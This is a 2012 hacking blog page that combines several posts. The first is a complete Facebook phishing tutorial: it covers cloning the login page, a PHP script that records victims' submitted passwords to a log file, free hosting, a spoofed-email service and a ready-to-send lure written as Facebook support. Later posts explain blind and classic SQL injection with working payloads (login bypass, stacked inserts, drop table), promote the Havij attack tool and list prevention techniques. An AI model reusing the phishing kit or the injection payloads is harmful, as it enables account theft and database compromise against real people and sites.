Sunday, June 17, 2012
In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with
action= “mail.php”
Now open notepad type following code in it and create mail.php.
Code:
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website createFacebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.
Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account
Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.
support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US
If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.
Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.
Sunday, June 17, 2012 0
Blind SQL injectiontechnique is used when the web application is vulnerable but the output doesn’t display to the attacker. When hacker tries SQL injection, they will redirect to some other pages instead of error message. Blind SQL Injection is harder to implement when compared with the above Traditional SQL Injection Technique, it will take more time . There are some tools for Blind SQL Injection.
Blind SQL injection can be done by querying the database with sequence of true/false questions.
How to detect the Blind SQL Injection Vulnerability?
Web application gets the clients input and supplied in where clause to retrieve data from Database. For instance, let us say the web application gets id and supplied to the sql query as followsStatement=”select * from userinfo where id=` “+id+” ` “;Hope you know about where clause and compound conditions (OR, AND). OR and AND are used to combine two conditions. The attacker can find the vulnerability by entering the compound conditions as input.
For instance, the attacker can enter id value as
1 AND 1=1
The above query will become
Select * from userinfo WHERE id=1 AND 1=1If the page remains on the same page, then the application may be vulnerable. This type of vulnerability occurs when the developer fails to validate the data type of ID. Here we give true condition (1=1). So if use false condition (1=2), it will raise an error message. We can conclude that if the condition is true, it remains in page. If false, showing error message.
Some Functions to be known
The following function will be useful for Blind SQL Injection.
substring(str, pos, length) is the function that returns the part of the String. sub string of the string is depending on the argument given to the function.
For instance substring(“hello”,2,1) will returns ‘e’.
Here string is “hello”, character position is 2 (that is ‘e’), and length is 1.
- lower(str) is the function that converts the character to lower case
- ascii(c) is the function that converts the character to ASCII value.
- length(str) returns the length of the string .
- user() returns the current user(admin)
- database() returns the database name.
- version() retruns the version of database
Blind Sql Injection Tools:
When come to Blind Sql Injection vulnerability, it will time consuming process. So Automated tools are better than manual process. Here are list of Automated Tools
Meet you at our Next Article with more details about the Blind Sql Injection Attack.
Sqlsus now supports time-based blind injection and automatically detects web server / suhosin / etc.. lentgh restrictions.
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
So far i have written what is sql Injection, How to prevent SQL Injection? . In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.
Download it From here:
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
The tool name is SQL Inject Me.
What is SQL Inject Me?
SQL Inject Me is Mozilla addon that is used to test the SQL Injection Vulnerability of Web Application. It reduces the workload of Manual SQL Injection Test. This is especially designed for Pen Testers and Web Masters not for hackers.
Download it From here:
https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/How it works?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.
The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.
The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
Hi webmasters and budding Pen Testers, I hope you read my article about SQL Injection. Our Aim is to provide Security, right? So here is the prevention techniques.
Use Prepared Statements:
Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
You can use Stored Procedures also. Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
Use Less Privilege Account:
Use less privilege account for database connections. That account should not be able to drop the able or create. Maintain two separate accounts.
Escape user input.
This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function. Later we will discuss about the syntax.
Assume magic quotes is always off.
When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :
Install patches regularly and timely.
Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.
Use automated test tools for SQL injections.
Even if you follow the above said prevention, there will be some vulnerability. You may not notice it. So check the vulnerability of your web application with some kind of SQLi tools.
Try SQL inject Me tool to test the Vulnerability of your WebSite.
See i just explained theoretically, I didn't explain with code. Don't worry, wait for my next post.
Use Prepared Statements:
Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.
- In Java you can use PreparedStatement() with bind variables
- In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
- In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).
You can use Stored Procedures also. Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
Use Less Privilege Account:
Use less privilege account for database connections. That account should not be able to drop the able or create. Maintain two separate accounts.
Escape user input.
This powerful function rejects the possibility of many clever techniques used by the intruders. php provides escpe string function. Later we will discuss about the syntax.
Assume magic quotes is always off.
When the magic_quotes_gpc variable is off, this can prevent some (but not all) SQL injection attacks. Magic quotes are not an ultimate defense and what is worse - sometimes they are off and you don't know about it. This is why it is necessary to have code for the substitution of quotes with slashes. Here is :
$username = $_POST['username'];if the magic quotes is enabled , the following problem will arise:
$password = $_POST['password'];
if (!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
- Not all data that are supplied by the user are intended for insertion into a database. They may be rendered directly to the screen, stored in a session, or previewed before saving. This can result in backslashes being added where they are not wanted and being shown to the end user. This bug often creeps into even widely used software.[7]
- Not all data that are supplied by the user and used in a database query are obtained directly from sources protected by magic quotes. For instance, a user-supplied value might be inserted into a database — protected by magic quotes — and later retrieved from the database and used in a subsequent database operation. The latter use is not protected by magic quotes, and a naive programmer used to relying on them may be unaware of the need to protect it explicitly.
- Magic quotes also use the generic functionality provided by PHP's addslashes() function, which is not Unicode aware and still subject to SQL injection vulnerabilities in some multi-byte character encodings. Database-specific functions such as mysql_real_escape_string() or, where possible, prepared queries with bound parameters are preferred.[8][9]
- While many DBMS support escaping quotes with a backslash, the standard actually calls for using another quote. Magic quotes offer no protection for databases not set up to support escaping quotes with a backslash.
- Portability is an issue if an application is coded with the assumption that magic quotes are enabled and is then moved to a server where they are disabled, or the other way round.
- Adding magic quotes and subsequently removing them where appropriate incurs a small but unnecessary performance overhead.
- Magic quotes do not protect against other common security vulnerabilities such as cross-site scripting attacks or SMTP header injection attacks.
Install patches regularly and timely.
Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.
Use automated test tools for SQL injections.
Even if you follow the above said prevention, there will be some vulnerability. You may not notice it. So check the vulnerability of your web application with some kind of SQLi tools.
Try SQL inject Me tool to test the Vulnerability of your WebSite.
See i just explained theoretically, I didn't explain with code. Don't worry, wait for my next post.
What an attacker can do?
- Bypassing Logins
- Accessing secret data
- Modifying contents of website
- Shutting down the database server
When Database is vulnerable?
When the developer fails to validate the Inputs, this vulnerability occurs. So the application runs the query without validating client’s input.Validation of escape characters ( ' )
The database is vulnerable when the developer input is not filtered for escape characters. For instance, assume you are getting username and password from user using the form. In order to check the username and password, you have to get the information associated with user name by the following query.
statement=”select * from `users` where `usrnam`= ' “+username+” ' ;”;In the above query, username is the variable which gets the user name from user as input.
The above query will retrieve the data if the username is available in database. The variable “username” gets the input from user and directly passed to the SQL statement without filtering the escape characters. Hackers can input the following code instead of username to breach the database:
' OR '1'='1When the hackers input one of the above codes as user name, the SQL query becomes
Select * from users where username=' ' or '1'='1'
Here username=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.
The above code can be enhanced with comment to block the rest of the statements of the query. The SQL support three different types of comments. They are /*, --, {{. So the enhanced malicious code with the comment is
' or '1'='1' -- 'When the hackers input one of the above codes as user name, the SQL query becomes
' or '1'='1' ({ '
' or '1'='1' /* '
Select * from users where username=' ' or '1'='1'--'
This query does the same. At the same time it will neglect the query behind the comment operator.
The user can do anything with database using this vulnerability. For example he can insert new user entry into the database. For Example, by giving the following input as the username:
hello'; insert into users value('us12', 'pas12'); select * from users where '1'='1';
So the above query will becomes
Select * from users where username=' hello'; insert into users value('us12', 'pas12'); select * from users where '1'='1';
This query will insert the us12 as user. At the same time it displays the list of users information.
Validation of Data Type
When the developer fails to check for the data type of input, it will arise the Vulnerability of Database. Let us consider this query.
Statement=”Select * from `userid` where `id`=”+inputId+”;” ;
Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.
For example if he input as
1; drop table `userid`;The query will become as
Select * from `userid` where `id`=1; drop table `userid`;
If you get the input from user and pass it directly, it causes to Vulnerability of Your Web application. Attackers can do anything with your database using this vulnerability. If he get the admin id and passwords, he is able to Deface your site. So you have to prevent from sql injection. How? Wait ..!!!wait i will post.
Here is practical Example for SQL Injection. This post is for Webmasters. They should know about the Vulnerability of your web Application to prevent hacking website.
Subscribe to:
Posts (Atom)
